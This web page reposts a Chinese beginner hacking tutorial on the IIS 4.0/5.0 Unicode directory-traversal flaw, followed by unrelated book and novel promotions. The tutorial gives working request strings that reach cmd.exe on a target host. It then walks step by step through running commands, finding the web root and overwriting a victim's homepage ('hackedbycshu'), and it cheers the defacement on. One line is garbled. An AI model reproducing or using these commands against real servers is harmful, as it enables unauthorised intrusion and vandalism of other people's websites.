登陆注册
178000000006

黑客初级技术讲解(下续二)

基础知识(2)

今天我们谈谈unicode漏洞,这可是基础中的基础,重点里的重点,不懂的一定要好好学。

2000年10月17日中联绿盟发布了以下的安全公告:

微软IIS 4.0 / 5.0 扩展UNICODE目录遍历漏洞

远程漏洞:是

本地漏洞:是

发布日期:2000年10月17日

更新日期:2000年10月17日

受影响的版本:

Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0

这可是中国乃至全球网络安全界的一次大变节,入侵nt/2000系统变得如此简单,不打补丁的死路一条。

下面开始正式学习:

一,UNICODE漏洞的原理

此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1, 中国台湾繁体中文也同样存在这样的漏洞。

中文版的WIN2000中,UNICODE编码 存在BUG,在UNICODE 编码中

%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = ’/’

%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = ’\’

在NT4中/编码为%c1%9c

在英文版里: WIN2000英文版%c0%af

在中文win2k里:%c1%1c

此外还有多种编码,不一一阐述。

本文例子均以win2k为准,其他类型请自行替换。

基础知识(3)

二,一切从基础开始

由于winnt\system32\cmd.exe的存在,使远程执行命令变为可能,在浏览器里输入以下请求:(假设11.11.22.22有漏洞)

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

学过dos的应该可以看懂,其实就是利用当中的非法请求使我们可以连到system32下,如果inetpub\目录不合winnt同盘,或者目录级数有改动,可能会引起请求失败。

如果成功,那么在浏览区可看到如下信息:

Directory of C:\inetpub\scripts

2000-09-28 15:49 〈DIR〉 .

2000-09-28 15:49 〈DIR〉 .. (假设目录中没有文件,实际上有一大堆)

是不是有自己机器的感觉了,正点!就是这种感觉!

cmd.exe相当与dos里的command.com,因此,我们可以执行很多命令了!

http://11.11.22.22/msadc/..%c1%1 ... em32/cmd.exe?/c+dir (这个命令同样道理)

大家请注意:/c后面的+,实际上,他就是空格,请记牢!dir开始就是dos命令了,我们可以更改一下:

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\winnt\auto.exe

会dos的朋友一定懂其意义了,不懂的请去看书 .

不用说,大家也知道我们就可以利用它来对有漏洞的机器展开攻击了!

三,实战演练

1,修改主页!(是不是很爽?)

一般主页位置在c:\inetpub\wwwroot下,但要是改了路径,就需要找找了。

最方便的方法:在浏览器里输入 http://11.11.22.22/.ida要是有漏洞,那在浏?..皇俏颐堑氖籽 ?/a>

分析法:用dir看各个盘符的根目录,看可疑的就进去看,运气好的在一分钟里找到,这要看运气和直觉。

dir/s法:首先在看其主页,找个图片或连接,看它的文件名,比如,11.11.22.22首页上有一幅图片,右击,属性,看到了吗?iloveu.gif,然后我们利用unicode输入这条命令dir c:\iloveu.gif /s意味着查找c盘下所有目录里的iloveu.gif,注意实际应用时别忘了把空格改为+,如果没有继续找d盘,很快就能确定主页目录的。

找到了目录,就要对它开刀了!一般默认收页为index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中的一个,现在我们确定11.11.22.22中为index.htm

那么我们就修改它吧!

最方便的方法:echo法。echo是一个系统命令,主要用于设置回应开关,而echo cshu >c:\autoexe.bat就是把cshu加入autoexec.bat里并删除原有内容,echo cshunice >>c:\autoexec.bat就是加入cshunice但不删除原有内容,这样我们就可以逍遥的改了。

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

回应为:HTTP 500 - 内部服务器错误

通过对cmd的分析,袁哥得出一条简便的方法,加入符号

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+2001730+>>c:\inetpub\wwwroot\index.htm

回应为:cgi错误,不用理会

两条命令一下,呵呵,再看看11.11.22.22,是不是烙上我们的大名了?不错吧

而在实际操作中,可能袁哥的方法也会失效,这时,我们就可以copy cmd.exe 为另一个exe,记住路径,用copy后的来echo

例如:11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\a.exe

11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

2,上传法:echo有点不讲道理,把人家的文件破坏了,要是想在主页上增光添彩,那就应该用改好的主页

同类推荐
  • 看穿人心术,拿来就用

    看穿人心术,拿来就用

    如果能掌握“看穿人心术”,人与人之间的沟通会更有效。本书要为您揭晓的“秘术”有:从弦外之音看人际关系、从外表和动作看本性、听到哪些话值得注意、从口头禅看相处之道、从不同的借口洞悉性格等。只要勤加“修炼”,谁都可以更有心机和技巧地处理好人际关系,让家庭更和睦、让工作环境更舒适。尊敬的书友,本书选载最精华部分供您阅读。留足悬念,同样精彩!
  • 演讲的艺术
  • 青少年最想问的60个心理问题

    青少年最想问的60个心理问题

    尊敬的书友,本书选载最精华部分供您阅读。留足悬念,同样精彩!结合青少年的心理现状,以简洁、鲜活、富有情趣的文字,再王见了青少年经常遇到的问题,进行心理分析,并为家长和老师提供解决心理问题的方法、对策和建议。表达清晰、分析透彻、观点鲜明,有较强的可读性和实用性,可谓是为青少年而写就的一本心理健康指导书。在《青少年最想问的60个心理问题(最新珍藏版)》的引导下,青少年可以走进自己的内心深处,在一个个故事中净化自己的心灵,呵护自己内心的世界,永葆心理健康,发掘内心的潜能,为成功塑造人生观和世界观打下坚实的基础。
  • 孩子一生最受用的40种能力

    孩子一生最受用的40种能力

    尊敬的书友,本书选载最精华部分供您阅读。留足悬念,同样精彩!本书作者提出的40种能力,对孩子在未来生活中的竞争力是不可缺少的,并相应的为家长提供实际的方法和原则,帮助父母在家庭生活中,如何和孩子共同培养这些能力,开启孩子生命中的优势密码。能力关乎孩子的一生,可以让孩子受益一生,从小培养孩子一生最受用的40种能力,它不仅可以开发孩子的才能和潜力,使其身心得到全面成长与成熟,还能把孩子培养成一个乐观、健康、全面发展的优秀人才。
热门推荐
  • 原始时代的帝国

    原始时代的帝国

    廖德远离开了自己家乡去从军,半年后一次从林训练,被送到伊拉克单独训练,在一次大山作战任务中,意外发现一搜飞船,好奇心驱使他去探险,来到飞船下面,突然一到强光把他劈到了原始时代,只有一身现代装备的他该何去和从呢?欢迎阅读我的处女之作,您的支持和鼓励就是我的灵感。
  • 校园绝品少爷

    校园绝品少爷

    他本是修炼家族天赋异禀的大少,却被阴谋设计,命悬一线,幸得恩师锦囊保命解难...纵横校园,闯于都市,屡陷阴谋,机智破除,身边红颜不离不弃...看逆天大少,能否强势回归...
  • 福妻驾到

    福妻驾到

    现代饭店彪悍老板娘魂穿古代。不分是非的极品婆婆?三年未归生死不明的丈夫?心狠手辣的阴毒亲戚?贪婪而好色的地主老财?吃上顿没下顿的贫困宭境?不怕不怕,神仙相助,一技在手,天下我有!且看现代张悦娘,如何身带福气玩转古代,开面馆、收小弟、左纳财富,右傍美男,共绘幸福生活大好蓝图!!!!快本新书《天媒地聘》已经上架开始销售,只要3.99元即可将整本书抱回家,你还等什么哪,赶紧点击下面的直通车,享受乐乐精心为您准备的美食盛宴吧!)
  • 神—领域

    神—领域

    注册游戏之后突然短路,房间中一片漆黑,不久之后出现一扇光芒四射的门,进入其中规则是前所未有的新奇。这个游戏不需要头盔,要的是玩家的亲身体会。
  • 我的皇妃是特种兵

    我的皇妃是特种兵

    她遭到国家与亲人的背叛,被以为自己一心灰意冷,命运的齿轮不断转动,她终于遇到……那个他。
  • 穿越之我成了一头猪

    穿越之我成了一头猪

    没吃过猪肉,还没见过猪跑吗?可你见过会飞的猪吗?可你见过会御剑的猪吗?可你见过会打太极拳的猪吗?一代太极拳天才穿越仙界,发现自己变成了一头猪,而且还是一头名猪,从此修最NB的功法,泡最美的主人,吃遍仙界无敌手。这个仙器不错,吃了,有点咯牙。这池灵泉不错,喝了,不会是仙女的洗澡水吧。这个美女不错,跟了,长得太像我前女友。这个敌人很坏,废了,以后什么仙王转世就不要在我面前出现了。诸天万界,世间万物,有啥我不能吞的。小弟:大哥,我上厕所没带纸你能帮帮我吗?猪:滚犊子。PS:打破常规,不一样的修仙,只有你想不到,其实我也想不到。PPS:本书作者已疯,只会扯蛋,如有雷同,实属不幸。
  • 冷艳狂妻:总裁大人请让道

    冷艳狂妻:总裁大人请让道

    “过来。”某女在床上摆着妖媚的身姿,对着刚从浴室出来的男人勾勾手。男人一副兴趣盎然的模样,来到到床边……五分钟后,男人被五花大绑地躺在床上,满脸抑制地盯着她……紧接着他便见她出去了,又想玩什么花样?不料她却不再回来……男人大口的吸着烟,“夏伊晴,终是我太信任你?想逃?呵呵……”
  • 永远牢记的承诺

    永远牢记的承诺

    榜样的力量是无穷的。我们生活的这个世界之所以越来越美好,越来越进步,就是因为有无数的精英人物前赴后继,用生命和鲜血换来的。他们有的为民请命,有的慷慨赴死,有的钻研学问,有的发明创造……
  • 逝水之小人物

    逝水之小人物

    星历988年,未来的大发明家周克还是个小混混,虫族还没有被吃到绝种,全民偶像路蓉在网游里跑腿赚学费,流银还是单纯的能量石……置身于逝水世界这方天地里,看小人物韩硕,在星际洪流中,赚钱养妹妹,绽放出属于自己的繁花。逝水世界不是穿越重生,是由超级主脑逝水所构建成的一方世界而已!硬要给他一个标签,大概就是类似于全息网游那种。
  • 全能教官

    全能教官

    他是世界最强的兵王,也是世界排名第二的佣兵团首领,他被世界各国元首称为“教皇”!一代兵王重回都市,只为了那曾经的梦想。为了那个被他称为“绝代妖姬”的女人,为了那个他第一眼看到便爱的无法自拔的女人。同时,教官生涯中。校花、警花、军花、师花、医花......各种佳丽,她们如约而至的来到他的身边,他该作何选择?是照单全收?还是溺水三千只取一瓢?